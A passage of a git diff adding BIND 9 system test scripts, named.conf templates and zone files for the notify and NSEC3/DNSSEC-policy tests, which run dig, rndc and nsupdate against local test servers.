; refresh (300 seconds) + 300 ; retry (300 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns5 +ns5 A 10.53.0.5 +a A 10.0.0.1 diff --git a/bin/tests/system/notify/setup.sh b/bin/tests/system/notify/setup.sh new file mode 100644 index 0000000..6b36b33 --- /dev/null +++ b/bin/tests/system/notify/setup.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf + +copy_setports ns4/named.port.in ns4/named.port + +cp -f ns2/example1.db ns2/example.db +cp -f ns2/generic.db ns2/x21.db diff --git a/bin/tests/system/notify/tests.sh b/bin/tests/system/notify/tests.sh new file mode 100644 index 0000000..c02654e --- /dev/null +++ b/bin/tests/system/notify/tests.sh @@ -0,0 +1,242 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +# +# Wait up to 10 seconds for the servers to finish starting before testing. +# +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG +tcp -p ${PORT} example @10.53.0.2 soa > dig.out.ns2.test$n || ret=1 + grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 + grep "flags:.* aa[ ;]" dig.out.ns2.test$n > /dev/null || ret=1 + $DIG +tcp -p ${PORT} example @10.53.0.3 soa > dig.out.ns3.test$n || ret=1 + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "flags:.* aa[ ;]" dig.out.ns3.test$n > /dev/null || ret=1 + nr=`grep 'x[0-9].*sending notify to' ns2/named.run | wc -l` + [ $nr -eq 20 ] || ret=1 + [ $ret = 0 ] && break + sleep 1 +done + +n=`expr $n + 1` +echo_i "checking initial status ($n)" +ret=0 +$DIG $DIGOPTS a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "10.0.0.1" dig.out.ns2.test$n > /dev/null || ret=1 + +$DIG $DIGOPTS a.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +grep "10.0.0.1" dig.out.ns3.test$n > /dev/null || ret=1 + +digcomp dig.out.ns2.test$n dig.out.ns3.test$n || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking startup notify rate limit ($n)" +ret=0 +awk '/x[0-9].*sending notify to/ { + split($2, a, ":"); + this = a[1] * 3600 + a[2] * 60 + a[3]; + if (lasta1 && lasta1 > a[1]) { + fix = 3600 * 24; + } + this += fix; + if (last) { + delta = this - last; + print delta; + + total += delta; + if (!maxdelta || delta > maxdelta) { + maxdelta = delta; + } + if (!mindelta || delta < mindelta) { + mindelta = delta; + } + } + lasta1 = a[1]; + last = this; + count++; +} +END { + average = total / count; + print "mindelta:", mindelta; + print "maxdelta:" maxdelta; + print "count:", count; + print "average:", average; + if (average < 0.180) exit(1); + if (count < 20) exit(1); +}' ns2/named.run > awk.out.ns2.test$n || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +nextpart ns3/named.run > /dev/null + +sleep 1 # make sure filesystem time stamp is newer for reload. +rm -f ns2/example.db +cp -f ns2/example2.db ns2/example.db +if [ ! "$CYGWIN" ]; then + echo_i "reloading with example2 using HUP and waiting up to 45 seconds" + $KILL -HUP `cat ns2/named.pid` +else + echo_i "reloading with example2 using rndc and waiting up to 45 seconds" + rndc_reload ns2 10.53.0.2 +fi + +try=0 +while test $try -lt 45 +do + nextpart ns3/named.run > tmp + grep "transfer of 'example/IN' from 10.53.0.2#.*success" tmp > /dev/null && break + sleep 1 + try=`expr $try + 1` +done + +n=`expr $n + 1` +echo_i "checking notify message was logged ($n)" +ret=0 +grep 'notify from 10.53.0.2#[0-9][0-9]*: serial 2$' ns3/named.run > /dev/null || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking example2 loaded ($n)" +ret=0 +$DIG $DIGOPTS a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "10.0.0.2" dig.out.ns2.test$n > /dev/null || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking example2 contents have been transferred after HUP reload ($n)" +ret=0 +$DIG $DIGOPTS a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "10.0.0.2" dig.out.ns2.test$n > /dev/null || ret=1 + +$DIG $DIGOPTS a.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +grep "10.0.0.2" dig.out.ns3.test$n > /dev/null || ret=1 + +digcomp dig.out.ns2.test$n dig.out.ns3.test$n || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +echo_i "stopping master and restarting with example4 then waiting up to 45 seconds" +stop_server ns2 + +rm -f ns2/example.db +cp -f ns2/example4.db ns2/example.db + +start_server --noclean --restart --port "${PORT}" ns2 + +try=0 +while test $try -lt 45 +do + nextpart ns3/named.run > tmp + grep "transfer of 'example/IN' from 10.53.0.2#.*success" tmp > /dev/null && break + sleep 1 + try=`expr $try + 1` +done + +n=`expr $n + 1` +echo_i "checking notify message was logged ($n)" +ret=0 +grep 'notify from 10.53.0.2#[0-9][0-9]*: serial 4$' ns3/named.run > /dev/null || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking example4 loaded ($n)" +ret=0 +$DIG $DIGOPTS a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "10.0.0.4" dig.out.ns2.test$n > /dev/null || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking example4 contents have been transferred after restart ($n)" +ret=0 +$DIG $DIGOPTS a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "10.0.0.4" dig.out.ns2.test$n > /dev/null || ret=1 + +$DIG $DIGOPTS a.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +grep "10.0.0.4" dig.out.ns3.test$n > /dev/null || ret=1 + +digcomp dig.out.ns2.test$n dig.out.ns3.test$n || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking notify to alternate port with master inheritance ($n)" +$NSUPDATE << EOF +server 10.53.0.2 ${PORT} +zone x21 +update add added.x21 0 in txt "test string" +send +EOF +for i in 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS added.x21. @10.53.0.4 txt -p $EXTRAPORT1 > dig.out.ns4.test$n || ret=1 + grep "test string" dig.out.ns4.test$n > /dev/null && break + sleep 1 +done +grep "test string" dig.out.ns4.test$n > /dev/null || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking notify to multiple views using tsig ($n)" +ret=0 +$NSUPDATE << EOF +server 10.53.0.5 ${PORT} +zone x21 +key a aaaaaaaaaaaaaaaaaaaa +update add added.x21 0 in txt "test string" +send +EOF + +for i in 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS added.x21. -y b:bbbbbbbbbbbbbbbbbbbb @10.53.0.5 \ + txt > dig.out.b.ns5.test$n || ret=1 + $DIG $DIGOPTS added.x21. -y c:cccccccccccccccccccc @10.53.0.5 \ + txt > dig.out.c.ns5.test$n || ret=1 + grep "test string" dig.out.b.ns5.test$n > /dev/null && + grep "test string" dig.out.c.ns5.test$n > /dev/null && + break + sleep 1 +done +grep "test string" dig.out.b.ns5.test$n > /dev/null || ret=1 +grep "test string" dig.out.c.ns5.test$n > /dev/null || ret=1 +grep "sending notify to 10.53.0.5#[0-9]* : TSIG (b)" ns5/named.run > /dev/null || ret=1 +grep "sending notify to 10.53.0.5#[0-9]* : TSIG (c)" ns5/named.run > /dev/null || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/nsec3/clean.sh b/bin/tests/system/nsec3/clean.sh new file mode 100644 index 0000000..b8e8317 --- /dev/null +++ b/bin/tests/system/nsec3/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +rm -f dig.out.* rndc.signing.* update.out.* verify.out.* +rm -f ns*/named.conf ns*/named.memstats ns*/named.run* +rm -f ns*/*.jnl ns*/*.jbk ns*/managed-keys.bind +rm -f ns*/K*.private ns*/K*.key ns*/K*.state +rm -f ns*/dsset-* ns*/*.db ns*/*.db.signed + diff --git a/bin/tests/system/nsec3/ns2/named.conf.in b/bin/tests/system/nsec3/ns2/named.conf.in new file mode 100644 index 0000000..d6caf15 --- /dev/null +++ b/bin/tests/system/nsec3/ns2/named.conf.in @@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +dnssec-policy "nsec3" { + nsec3param; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm @DEFAULT_HMAC@; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "nsec3-xfr-inline.kasp" { + type primary; + file "nsec3-xfr-inline.kasp.db"; + inline-signing yes; + dnssec-policy "nsec3"; +}; diff --git a/bin/tests/system/nsec3/ns2/setup.sh b/bin/tests/system/nsec3/ns2/setup.sh new file mode 100644 index 0000000..1cbe02f --- /dev/null +++ b/bin/tests/system/nsec3/ns2/setup.sh @@ -0,0 +1,22 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../../conf.sh + +echo_i "ns2/setup.sh" + +zone="nsec3-xfr-inline.kasp" +echo_i "setting up zone: $zone" +zonefile="${zone}.db" +cp template.db.in "$zonefile" diff --git a/bin/tests/system/nsec3/ns2/template.db.in b/bin/tests/system/nsec3/ns2/template.db.in new file mode 100644 index 0000000..8379c37 --- /dev/null +++ b/bin/tests/system/nsec3/ns2/template.db.in @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns2 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/nsec3/ns3/named.conf.in b/bin/tests/system/nsec3/ns3/named.conf.in new file mode 100644 index 0000000..4324f2d --- /dev/null +++ b/bin/tests/system/nsec3/ns3/named.conf.in @@ -0,0 +1,162 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +dnssec-policy "nsec" { + // no need to change configuration: if no 'nsec3param' is set, + // NSEC will be used; +}; + +dnssec-policy "nsec3" { + nsec3param; +}; + +dnssec-policy "optout" { + nsec3param optout yes; +}; + +dnssec-policy "nsec3-other" { + nsec3param iterations 11 optout yes salt-length 0; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* This zone starts with NSEC, but will be reconfigured to use NSEC3. */ +zone "nsec-to-nsec3.kasp" { + type primary; + file "nsec-to-nsec3.kasp.db"; + inline-signing yes; + dnssec-policy "nsec"; +}; + +/* These zones use the default NSEC3 settings. */ +zone "nsec3.kasp" { + type primary; + file "nsec3.kasp.db"; + inline-signing yes; + dnssec-policy "nsec3"; +}; + +zone "nsec3-dynamic.kasp" { + type primary; + file "nsec3-dynamic.kasp.db"; + dnssec-policy "nsec3"; + allow-update { any; }; +}; + +/* This zone uses non-default NSEC3 settings. */ +zone "nsec3-other.kasp" { + type primary; + file "nsec3-other.kasp.db"; + inline-signing yes; + dnssec-policy "nsec3-other"; +}; + +/* These zones will be reconfigured to use other NSEC3 settings. */ +zone "nsec3-change.kasp" { + type primary; + file "nsec3-change.kasp.db"; + inline-signing yes; + dnssec-policy "nsec3"; +}; + +zone "nsec3-dynamic-change.kasp" { + type primary; + file "nsec3-dynamic-change.kasp.db"; + dnssec-policy "nsec3"; + allow-update { any; }; +}; + +/* The zone will be reconfigured to use opt-out. */ +zone "nsec3-to-optout.kasp" { + type primary; + file "nsec3-to-optout.kasp.db"; + inline-signing yes; + dnssec-policy "nsec3"; +}; + +/* The zone will be reconfigured to disable opt-out. */ +zone "nsec3-from-optout.kasp" { + type primary; + file "nsec3-from-optout.kasp.db"; + inline-signing yes; + dnssec-policy "optout"; +}; + +/* The zone starts with NSEC3, but will be reconfigured to use NSEC. */ +zone "nsec3-to-nsec.kasp" { + type primary; + file "nsec3-to-nsec.kasp.db"; + inline-signing yes; + dnssec-policy "nsec3"; +}; + +/* The zone fails to load, this should not prevent shutdown. */ +zone "nsec3-fails-to-load.kasp" { + type primary; + file "nsec3-fails-to-load.kasp.db"; + dnssec-policy "nsec3"; + allow-update { any; }; +}; + +/* These zones switch from dynamic to inline-signing or vice versa. */ +zone "nsec3-dynamic-to-inline.kasp" { + type primary; + file "nsec3-dynamic-to-inline.kasp.db"; + dnssec-policy "nsec3"; + allow-update { any; }; +}; + +zone "nsec3-inline-to-dynamic.kasp" { + type primary; + file "nsec3-inline-to-dynamic.kasp.db"; + inline-signing yes; + dnssec-policy "nsec3"; +}; + +/* Test adding a NSEC3 record to an inline-signing dnssec-policy zone. */ +zone "nsec3-dynamic-update-inline.kasp" { + type primary; + file "nsec3-dynamic-update-inline.kasp.db"; + inline-signing yes; + allow-update { any; }; + dnssec-policy "nsec"; +}; + +zone "nsec3-xfr-inline.kasp" { + type secondary; + file "nsec3-xfr-inline.kasp.db"; + inline-signing yes; + dnssec-policy "nsec"; + primaries { 10.53.0.2; }; +}; diff --git a/bin/tests/system/nsec3/ns3/named2.conf.in b/bin/tests/system/nsec3/ns3/named2.conf.in new file mode 100644 index 0000000..5c3b970 --- /dev/null +++ b/bin/tests/system/nsec3/ns3/named2.conf.in @@ -0,0 +1,153 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +dnssec-policy "nsec" { + // no need to change configuration: if no 'nsec3param' is set, + // NSEC will be used; +}; + +dnssec-policy "nsec3" { + nsec3param; +}; + +dnssec-policy "optout" { + nsec3param optout yes; +}; + +dnssec-policy "nsec3-other" { + nsec3param iterations 11 optout yes salt-length 0; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* This zone starts with NSEC, but will be reconfigured to use NSEC3. */ +zone "nsec-to-nsec3.kasp" { + type primary; + file "nsec-to-nsec3.kasp.db"; + inline-signing yes; + //dnssec-policy "nsec"; + dnssec-policy "nsec3"; +}; + +/* These zones use the default NSEC3 settings. */ +zone "nsec3.kasp" { + type primary; + file "nsec3.kasp.db"; + inline-signing yes; + dnssec-policy "nsec3"; +}; + +zone "nsec3-dynamic.kasp" { + type primary; + file "nsec3-dynamic.kasp.db"; + dnssec-policy "nsec3"; + allow-update { any; }; +}; + +/* This zone uses non-default NSEC3 settings. */ +zone "nsec3-other.kasp" { + type primary; + file "nsec3-other.kasp.db"; + inline-signing yes; + dnssec-policy "nsec3-other"; +}; + +/* These zone will be reconfigured to use other NSEC3 settings. */ +zone "nsec3-change.kasp" { + type primary; + file "nsec3-change.kasp.db"; + inline-signing yes; + //dnssec-policy "nsec3"; + dnssec-policy "nsec3-other"; +}; + +zone "nsec3-dynamic-change.kasp" { + type primary; + file "nsec3-dynamic-change.kasp.db"; + //dnssec-policy "nsec3"; + dnssec-policy "nsec3-other"; + allow-update { any; }; +}; + +/* The zone will be reconfigured to use opt-out. */ +zone "nsec3-to-optout.kasp" { + type primary; + file "nsec3-to-optout.kasp.db"; + inline-signing yes; + //dnssec-policy "nsec3"; + dnssec-policy "optout"; +}; + +/* The zone will be reconfigured to disable opt-out. */ +zone "nsec3-from-optout.kasp" { + type primary; + file "nsec3-from-optout.kasp.db"; + inline-signing yes; + //dnssec-policy "optout"; + dnssec-policy "nsec3"; +}; + +/* The zone starts with NSEC3, but will be reconfigured to use NSEC. */ +zone "nsec3-to-nsec.kasp" { + type primary; + file "nsec3-to-nsec.kasp.db"; + inline-signing yes; + //dnssec-policy "nsec3"; + dnssec-policy "nsec"; +}; + +/* The zone fails to load, but is fixed after a reload. */ +zone "nsec3-fails-to-load.kasp" { + type primary; + file "nsec3-fails-to-load.kasp.db"; + dnssec-policy "nsec3"; + allow-update { any; }; +}; + +/* These zones switch from dynamic to inline-signing or vice versa. */ +zone "nsec3-dynamic-to-inline.kasp" { + type primary; + file "nsec3-dynamic-to-inline.kasp.db"; + inline-signing yes; + dnssec-policy "nsec3"; + allow-update { any; }; +}; + +zone "nsec3-inline-to-dynamic.kasp" { + type primary; + file "nsec3-inline-to-dynamic.kasp.db"; + inline-signing no; + dnssec-policy "nsec3"; + allow-update { any; }; +}; diff --git a/bin/tests/system/nsec3/ns3/nsec3-fails-to-load.kasp.db.in b/bin/tests/system/nsec3/ns3/nsec3-fails-to-load.kasp.db.in new file mode 100644 index 0000000..77b0d10 --- /dev/null +++ b/bin/tests/system/nsec3/ns3/nsec3-fails-to-load.kasp.db.in @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ IN SOA kasp. nsec3-fails-to-load.kasp. ( + 1 ; serial + 30 ; refresh (30 seconds) + 10 ; retry (10 seconds) + 3600000 ; expire (5 weeks 6 days 16 hours) + 300 ; minimum (5 minutes) + ) + NS nsec3-fails-to-load.kasp. diff --git a/bin/tests/system/nsec3/ns3/setup.sh b/bin/tests/system/nsec3/ns3/setup.sh new file mode 100644 index 0000000..b7c449a --- /dev/null +++ b/bin/tests/system/nsec3/ns3/setup.sh @@ -0,0 +1,35 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../../conf.sh + +echo_i "ns3/setup.sh" + +setup() { + zone="$1" + echo_i "setting up zone: $zone" + zonefile="${zone}.db" + infile="${zone}.db.infile" + cp template.db.in "$zonefile" +} + +for zn in nsec-to-nsec3 nsec3 nsec3-other nsec3-change nsec3-to-nsec \ + nsec3-to-optout nsec3-from-optout nsec3-dynamic \ + nsec3-dynamic-change nsec3-dynamic-to-inline \ + nsec3-inline-to-dynamic nsec3-dynamic-update-inline +do + setup "${zn}.kasp" +done + +cp nsec3-fails-to-load.kasp.db.in nsec3-fails-to-load.kasp.db diff --git a/bin/tests/system/nsec3/ns3/template.db.in b/bin/tests/system/nsec3/ns3/template.db.in new file mode 100644 index 0000000..010b05b --- /dev/null +++ b/bin/tests/system/nsec3/ns3/template.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns3 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/nsec3/setup.sh b/bin/tests/system/nsec3/setup.sh new file mode 100644 index 0000000..bdd1ae9 --- /dev/null +++ b/bin/tests/system/nsec3/setup.sh @@ -0,0 +1,30 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../conf.sh + +set -e + +$SHELL clean.sh + +copy_setports ns2/named.conf.in ns2/named.conf +( + cd ns2 + $SHELL setup.sh +) +copy_setports ns3/named.conf.in ns3/named.conf +( + cd ns3 + $SHELL setup.sh +) diff --git a/bin/tests/system/nsec3/tests.sh b/bin/tests/system/nsec3/tests.sh new file mode 100644 index 0000000..0141103 --- /dev/null +++ b/bin/tests/system/nsec3/tests.sh @@ -0,0 +1,388 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../conf.sh +# shellcheck source=kasp.sh +. ../kasp.sh + +# Log errors and increment $ret. +log_error() { + echo_i "error: $1" + ret=$((ret+1)) +} + +# Call dig with default options. +dig_with_opts() { + $DIG +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" +} + +# Call rndc. +rndccmd() { + "$RNDC" -c ../common/rndc.conf -p "$CONTROLPORT" -s "$@" +} + +# Set zone name ($1) and policy ($2) for testing nsec3. +set_zone_policy() { + ZONE=$1 + POLICY=$2 +} +# Set expected NSEC3 parameters: flags ($1), iterations ($2), and +# salt length ($3). +set_nsec3param() { + FLAGS=$1 + ITERATIONS=$2 + SALTLEN=$3 + # Reset salt. + SALT="" +} + +# The apex NSEC3PARAM record indicates that it is signed. +_wait_for_nsec3param() { + dig_with_opts +noquestion "@${SERVER}" "$ZONE" NSEC3PARAM > "dig.out.test$n.wait" || return 1 + grep "${ZONE}\..*IN.*NSEC3PARAM.*1.*0.*${ITERATIONS}.*${SALT}" "dig.out.test$n.wait" > /dev/null || return 1 + grep "${ZONE}\..*IN.*RRSIG" "dig.out.test$n.wait" > /dev/null || return 1 + return 0 +} +# The apex NSEC record indicates that it is signed. +_wait_for_nsec() { + dig_with_opts +noquestion "@${SERVER}" "$ZONE" NSEC > "dig.out.test$n.wait" || return 1 + grep "NS SOA" "dig.out.test$n.wait" > /dev/null || return 1 + grep "${ZONE}\..*IN.*RRSIG" "dig.out.test$n.wait" > /dev/null || return 1 + grep "${ZONE}\..*IN.*NSEC3PARAM" "dig.out.test$n.wait" > /dev/null && return 1 + return 0 +} + +# Wait for the zone to be signed. +wait_for_zone_is_signed() { + n=$((n+1)) + ret=0 + echo_i "wait for ${ZONE} to be signed ($n)" + + if [ "$1" = "nsec3" ]; then + retry_quiet 10 _wait_for_nsec3param || log_error "wait for ${ZONE} to be signed failed" + else + retry_quiet 10 _wait_for_nsec || log_error "wait for ${ZONE} to be signed failed" + fi + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Test: check NSEC in answers +_check_nsec_nsec3param() +{ + dig_with_opts +noquestion @$SERVER "${ZONE}" NSEC3PARAM > "dig.out.test$n.nsec3param.$ZONE" || return 1 + grep "NSEC3PARAM" "dig.out.test$n.nsec3param.$ZONE" > /dev/null && return 1 + return 0 +} + +_check_nsec_nxdomain() +{ + dig_with_opts @$SERVER "nosuchname.${ZONE}" > "dig.out.test$n.nxdomain.$ZONE" || return 1 + grep "${ZONE}.*IN.*NSEC.*NS.*SOA.*RRSIG.*NSEC.*DNSKEY" "dig.out.test$n.nxdomain.$ZONE" > /dev/null || return 1 + grep "NSEC3" "dig.out.test$n.nxdomain.$ZONE" > /dev/null && return 1 + return 0 +} + +check_nsec() +{ + n=$((n+1)) + echo_i "check NSEC3PARAM response for zone ${ZONE} ($n)" + ret=0 + retry_quiet 10 _check_nsec_nsec3param || log_error "unexpected NSEC3PARAM in response for zone ${ZONE}" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + + n=$((n+1)) + echo_i "check NXDOMAIN response for zone ${ZONE} ($n)" + ret=0 + retry_quiet 10 _check_nsec_nxdomain || log_error "bad NXDOMAIN response for zone ${ZONE}" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Test: check NSEC3 parameters in answers +_check_nsec3_nsec3param() +{ + dig_with_opts +noquestion @$SERVER "${ZONE}" NSEC3PARAM > "dig.out.test$n.nsec3param.$ZONE" || return 1 + grep "${ZONE}.*0.*IN.*NSEC3PARAM.*1.*0.*${ITERATIONS}.*${SALT}" "dig.out.test$n.nsec3param.$ZONE" > /dev/null || return 1 + + if [ -z "$SALT" ]; then + SALT=`awk '$4 == "NSEC3PARAM" { print $8 }' dig.out.test$n.nsec3param.$ZONE` + fi + return 0 +} + +_check_nsec3_nxdomain() +{ + dig_with_opts @$SERVER "nosuchname.${ZONE}" > "dig.out.test$n.nxdomain.$ZONE" || return 1 + grep ".*\.${ZONE}.*IN.*NSEC3.*1.${FLAGS}.*${ITERATIONS}.*${SALT}" "dig.out.test$n.nxdomain.$ZONE" > /dev/null || return 1 + return 0 +} + +check_nsec3() +{ + n=$((n+1)) + echo_i "check that NSEC3PARAM 1 0 ${ITERATIONS} is published zone ${ZONE} ($n)" + ret=0 + retry_quiet 10 _check_nsec3_nsec3param || log_error "bad NSEC3PARAM response for ${ZONE}" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + + n=$((n+1)) + 